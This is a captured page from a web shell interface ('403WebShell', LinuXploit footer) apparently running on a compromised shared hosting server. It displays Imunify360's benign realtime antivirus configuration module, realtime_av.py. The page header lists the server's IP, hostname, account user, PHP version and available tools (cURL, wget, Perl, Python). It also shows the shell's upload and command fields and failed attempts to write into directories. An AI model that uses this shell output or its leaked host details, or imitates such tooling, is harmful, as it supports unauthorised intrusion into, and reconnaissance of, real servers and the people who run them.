Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.101.250
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/subsys/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/subsys/realtime_av.py
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import asyncio
import base64
import logging
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Iterable, List, Set, Tuple

from defence360agent.contracts.config import ANTIVIRUS_MODE, Malware
from defence360agent.subsys.panels.hosting_panel import HostingPanel
from defence360agent.utils import check_run
from imav.malwarelib.model import MalwareIgnorePath
from imav.malwarelib.scan.crontab import crontab_path

# module-level logger named after this module
logger = logging.getLogger(__name__)

# location of admin provided watched and ignored paths
_ADMIN_PATH = Path("/etc/sysconfig/imunify360/malware-filters-admin-conf")
# location of internal configs, shipped with imunify360-firewall
_INTERNAL_PATH = Path("/var/imunify360/files/realtime-av-conf/v1")
# location of processed configs
_PROCESSED_PATH = _ADMIN_PATH / "processed"

# file name of the combined (internal + admin) ignored pattern; also the name
# of the symlink created in _ADMIN_PATH that points at the processed copy
_PD_NAME = "pd-combined.txt"
# file name used for lists built from the internal configs
_INTERNAL_NAME = "av-internal.txt"
# file name used for lists built from the admin configs
_ADMIN_NAME = "av-admin.txt"
# file name of the base64-encoded list of ignored paths
_ADMIN_PATHS_NAME = "av-admin-paths.txt"
# sub directory (inside the processed directory) holding ignored patterns
_IGNORED_SUB_DIR = "ignored"
# maximum allowed length of a single saved ignored pattern
_MAX_PATTERN_LENGTH = 64000

# name of the service restarted by reload_services()
_SERVICE = "imunify-realtime-av"
# executable run by reload_services() after the service restart is requested
_PD_PREPARE = "/usr/bin/i360-exclcomp"


class PatternLengthError(Exception):
    """Signals that an ignored pattern is longer than the allowed maximum."""


def _save_basedirs(dir: Path, basedirs: Set[str]) -> None:
    """Write basedirs to ``basedirs-list.txt`` inside dir, one per line.

    The basedirs are sorted as given and each one is then resolved with
    os.path.realpath() before being written.
    """
    listing = dir / "basedirs-list.txt"
    with listing.open("w") as out:
        out.writelines(
            os.path.realpath(entry) + "\n" for entry in sorted(basedirs)
        )


def _split_paths(paths: List[str]) -> Tuple[List[str], List[str]]:
    """Partition paths into (absolute, relative) lists, keeping their order.

    A path is relative when it starts with "+"; that single leading "+" is
    stripped from the stored value. Every other path is treated as absolute
    and stored unchanged."""
    absolute: List[str] = []
    relative: List[str] = []
    for item in paths:
        marked = item.startswith("+")
        bucket = relative if marked else absolute
        bucket.append(item[1:] if marked else item)
    return absolute, relative


def _read_list(path: Path) -> List[str]:
    """Return the meaningful lines of the file at path.

    Every line is stripped of surrounding whitespace; lines that are empty
    after stripping or that start with '#' are dropped. A missing file
    yields an empty list."""
    entries: List[str] = []
    try:
        with path.open() as src:
            for raw in src:
                text = raw.strip()
                if text and not text.startswith("#"):
                    entries.append(text)
    except FileNotFoundError:
        return []
    return entries


class _Watched(list):
    """Holds a list of watched glob patterns ready to be saved.

    The list is built from raw config entries: entries starting with "+"
    are relative and get joined with every basedir, all other entries are
    taken as absolute. Entries that pass validation are stored after being
    resolved with os.path.realpath().
    """

    def __init__(self, w: List[str], basedirs: Set[str]) -> None:
        """Populate the list from raw entries w and the given basedirs."""
        super().__init__()
        absolute, relative = _split_paths(w)
        candidates = absolute + self._extend_relative(relative, basedirs)
        # Validation runs on the raw pattern, before it is resolved.
        self.extend(
            os.path.realpath(p) for p in candidates if self._is_valid(p)
        )

    @staticmethod
    def _is_valid(pattern: str) -> bool:
        """Return True if watched pattern is valid (starts with "/").

        Invalid patterns are reported with a warning."""
        if not pattern.startswith("/"):
            logger.warning(
                "skipping watched path %s: not starts with /", pattern
            )
            return False
        return True

    @staticmethod
    def _extend_relative(paths: List[str], basedirs: Set[str]) -> List[str]:
        """Join every basedir with every path and return the resulting list.

        Basedirs are visited in sorted order. Iterating the set directly
        would make the order (and therefore the saved file) depend on string
        hashing, which differs between interpreter runs, so identical
        configs could look changed when compared with a previous save."""
        ordered = sorted(basedirs)
        return [
            os.path.join(basedir, path) for path in paths for basedir in ordered
        ]

    def save(self, path: Path) -> None:
        """Save watched list at specified path, one pattern per line.

        No newline is written after the last pattern."""
        with path.open("w") as f:
            f.write("\n".join(self))


class _Ignored(str):
    """Holds a list of ignored regexp patterns ready to be saved.

    The value of the string is a single regexp: all accepted patterns
    joined with "|".
    """

    @staticmethod
    def _is_valid_relative(pattern: str) -> bool:
        """Return True if relative ignored pattern is valid.

        A relative pattern must not start with "^" because it gets prefixed
        with the basedirs alternative. Rejected patterns are logged."""
        if pattern.startswith("^"):
            logger.warning(
                "skipping relative ignored path %s: starts with ^", pattern
            )
            return False
        return True

    @staticmethod
    def _remove_leading_slash(pattern: str) -> str:
        """Remove a single leading slash from pattern, if present."""
        if pattern.startswith("/"):
            return pattern[1:]
        return pattern

    @staticmethod
    def _compiles(pattern: str) -> bool:
        """Return True if pattern successfully compiles as regexp.

        Patterns that fail to compile are logged and reported as False."""
        try:
            re.compile(pattern)
            return True
        except Exception:
            # Deliberately broad: any failure to compile means "skip it".
            logger.warning(
                "skipping ignored pattern %s: invalid regex", pattern
            )
            return False

    @staticmethod
    def _relative_regex(basedirs: Set[str], relative: List[str]) -> str:
        """Return the regexp matching any relative pattern under any basedir.

        Basedirs are joined in sorted order. Joining the set directly would
        make the text depend on string hashing, which differs between
        interpreter runs, so identical configs could produce different
        files and be reported as changed."""
        return "^(?:{})/(?:{})".format(
            "|".join(sorted(basedirs)), "|".join(relative)
        )

    @classmethod
    def from_patterns(
        cls, patterns: List[str], basedirs: Set[str]
    ) -> "_Ignored":
        """Build single ignored regexp from given patterns and basedirs.

        Patterns starting with "+" are relative: they are validated, get a
        leading slash removed and are anchored under the basedirs. All other
        patterns are used as is. Patterns that do not compile are skipped.
        If nothing is left, the result is "^$".
        """
        absolute, relative = _split_paths(patterns)
        absolute = [p for p in absolute if cls._compiles(p)]
        relative = [
            cls._remove_leading_slash(p)
            for p in relative
            if cls._is_valid_relative(p) and cls._compiles(p)
        ]
        if basedirs and relative:
            absolute.append(cls._relative_regex(basedirs, relative))
        # "^$" stands in for an empty pattern list.
        return cls("|".join(absolute) or "^$")

    def save(self, path: Path):
        """Save ignored list at specified path.

        Raises PatternLengthError if the pattern is longer than
        _MAX_PATTERN_LENGTH; nothing is written in that case."""
        if len(self) > _MAX_PATTERN_LENGTH:
            raise PatternLengthError(
                "{} pattern is too long ({})".format(path, len(self))
            )
        with path.open("w") as f:
            f.write(self)


def _read_configs(panel: str, name: str) -> Tuple[List[str], List[str]]:
    """Return (internal, admin) lists read from config files called name.

    The internal list is the content of the "common" config followed by the
    content of the config for the lower-cased panel, when a directory for
    that panel exists. The admin list comes from the admin config directory.
    """
    internal = _read_list(_INTERNAL_PATH / "common" / name)

    panel_dir = _INTERNAL_PATH / panel.lower()
    if panel_dir.exists():
        internal += _read_list(panel_dir / name)

    admin = _read_list(_ADMIN_PATH / name)
    return internal, admin


class _WatchedCtx:
    """Pair of internal and admin watched lists that are saved together."""

    def __init__(self, internal: _Watched, admin: _Watched) -> None:
        self.internal, self.admin = internal, admin

    def save(self, dir: Path) -> None:
        """Write both lists into the "watched" sub directory of dir.

        The sub directory is created when it does not exist yet."""
        watched_dir = dir / "watched"
        watched_dir.mkdir(exist_ok=True)
        outputs = (
            (self.internal, _INTERNAL_NAME),
            (self.admin, _ADMIN_NAME),
        )
        for watched, file_name in outputs:
            watched.save(watched_dir / file_name)


def _watched_context(
    panel_name: str, basedirs: Set[str], *, extra: Iterable[str]
) -> _WatchedCtx:
    """Build the watched context for the given panel.

    Entries are read from the "watched.txt" configs; the extra entries are
    appended to the internal ones before the lists are built."""
    internal_entries, admin_entries = _read_configs(panel_name, "watched.txt")
    internal_entries.extend(extra)
    internal = _Watched(internal_entries, basedirs)
    admin = _Watched(admin_entries, basedirs)
    return _WatchedCtx(internal, admin)


class _IgnoredCtx:
    """Internal, admin and combined ignored patterns saved together."""

    def __init__(
        self, internal: _Ignored, admin: _Ignored, pd: _Ignored
    ) -> None:
        self.internal, self.admin, self.pd = internal, admin, pd

    def save(self, dir: Path) -> None:
        """Write the three patterns into the ignored sub directory of dir.

        The sub directory is created when it does not exist yet."""
        ignored_dir = dir / _IGNORED_SUB_DIR
        ignored_dir.mkdir(exist_ok=True)
        outputs = (
            (self.internal, _INTERNAL_NAME),
            (self.admin, _ADMIN_NAME),
            (self.pd, _PD_NAME),
        )
        for pattern, file_name in outputs:
            pattern.save(ignored_dir / file_name)


def _ignored_context(panel_name: str, basedirs: Set[str]) -> _IgnoredCtx:
    """Build the ignored context for the given panel.

    Patterns are read from the "ignored.txt" configs. Three regexps are
    produced: internal only, admin only, and internal followed by admin."""
    internal_patterns, admin_patterns = _read_configs(
        panel_name, "ignored.txt"
    )
    internal = _Ignored.from_patterns(internal_patterns, basedirs)
    admin = _Ignored.from_patterns(admin_patterns, basedirs)
    combined = _Ignored.from_patterns(
        internal_patterns + admin_patterns, basedirs
    )
    return _IgnoredCtx(internal, admin, combined)


def _admin_ignored_paths(dir: Path) -> None:
    """Write the ignored paths into the ignored sub directory of dir.

    Each path returned by MalwareIgnorePath.path_list() is encoded with
    os.fsencode(), base64-encoded and written on its own line. The ignored
    sub directory is expected to exist already."""
    encoded_lines = [
        base64.b64encode(os.fsencode(ignored)) + b"\n"
        for ignored in MalwareIgnorePath.path_list()
    ]
    destination = dir / _IGNORED_SUB_DIR / _ADMIN_PATHS_NAME
    destination.write_bytes(b"".join(encoded_lines))


def _contain_changes(dir1: Path, dir2: Path) -> bool:
    """Return True if some file under dir1 differs from its twin in dir2.

    Sub directories of dir1 are checked recursively. A regular file counts
    as changed when it is missing from dir2 or its bytes differ. The check
    is one-directional: entries that exist only in dir2 are not looked at.
    Return False when no difference is found."""
    for entry in dir1.iterdir():
        counterpart = dir2 / entry.name
        if entry.is_dir() and _contain_changes(entry, counterpart):
            return True
        if entry.is_file() and (
            not counterpart.exists()
            or entry.read_bytes() != counterpart.read_bytes()
        ):
            return True
    return False


def _save_configs(dir: Path, savers: List[Callable[[Path], None]]) -> bool:
    """Regenerate the configs in dir and report whether they changed.

    Every callable in savers is invoked with a freshly created staging
    directory (dir with a ".tmp" suffix). The staging directory then takes
    the place of dir, while the previous dir is kept next to it under the
    name ".backup". Return True when dir did not exist before, otherwise
    the result of comparing the new dir against the backup."""
    staging = dir.with_suffix(".tmp")
    # Drop whatever is left from an earlier run.
    if staging.exists():
        shutil.rmtree(str(staging))
    staging.mkdir()

    for saver in savers:
        saver(staging)

    if not dir.exists():
        staging.rename(dir)
        return True

    previous = dir.with_name(".backup")
    if previous.exists():
        shutil.rmtree(str(previous))
    dir.rename(previous)
    try:
        staging.rename(dir)
    except Exception:
        # Put the old configs back before propagating the failure.
        previous.rename(dir)
        raise
    return _contain_changes(dir, previous)


def _update_pd_symlink() -> None:
    """Make the combined-pattern link in the admin directory point at the
    processed combined pattern file.

    A missing link is created; an entry that is not a symlink, or a symlink
    that points elsewhere, is removed and recreated."""
    destination = _PROCESSED_PATH / _IGNORED_SUB_DIR / _PD_NAME
    link = _ADMIN_PATH / _PD_NAME
    try:
        # exists() reports False for a broken symlink, so probe with
        # lstat(): it raises only when there is no entry at all.
        link.lstat()
    except FileNotFoundError:
        link.symlink_to(destination)
        return
    if link.is_symlink() and os.readlink(str(link)) == str(destination):
        return
    link.unlink()
    link.symlink_to(destination)


def generate_configs() -> bool:
    """Generate new malware paths filters config.

    Saves the basedirs list, the watched lists, the ignored patterns and the
    admin ignored paths into the processed directory, then refreshes the
    combined-pattern symlink. Return the value reported by _save_configs()
    (whether the saved configs changed)."""
    panel = HostingPanel()
    basedirs = panel.basedirs()

    # The crontab location is watched only when crontab scanning is enabled.
    if Malware.CRONTABS_SCAN_ENABLED:
        extra_watched = {str(crontab_path())}
    else:
        extra_watched = set()

    def save_basedirs(dir: Path) -> None:
        _save_basedirs(dir, {*basedirs, *extra_watched})

    watched = _watched_context(panel.NAME, basedirs, extra=extra_watched)
    ignored = _ignored_context(panel.NAME, basedirs)
    savers = [save_basedirs, watched.save, ignored.save, _admin_ignored_paths]

    changed = _save_configs(_PROCESSED_PATH, savers)
    _update_pd_symlink()
    return changed


async def reload_services() -> None:  # pragma: no cover
    """Restart the realtime AV service and run the pattern prepare tool.

    Both check_run() calls are made up front and their results are awaited
    one after another. Cancellation is propagated; any other failure is
    logged as a warning and does not stop the remaining step."""
    commands = (["service", _SERVICE, "restart"], [_PD_PREPARE])
    pending = [check_run(command) for command in commands]
    for awaitable in pending:
        try:
            await awaitable
        except asyncio.CancelledError:
            raise
        except Exception as exc:
            logger.warning("realtime_av.reload_services exception: %s", exc)


def should_be_running() -> bool:
    """Tell whether the realtime AV service is expected to run.

    It is never expected in antivirus mode; otherwise the answer is the
    Malware.INOTIFY_ENABLED setting."""
    if ANTIVIRUS_MODE:
        return False
    return Malware.INOTIFY_ENABLED

Youez - 2016 - github.com/yon3zu
LinuXploit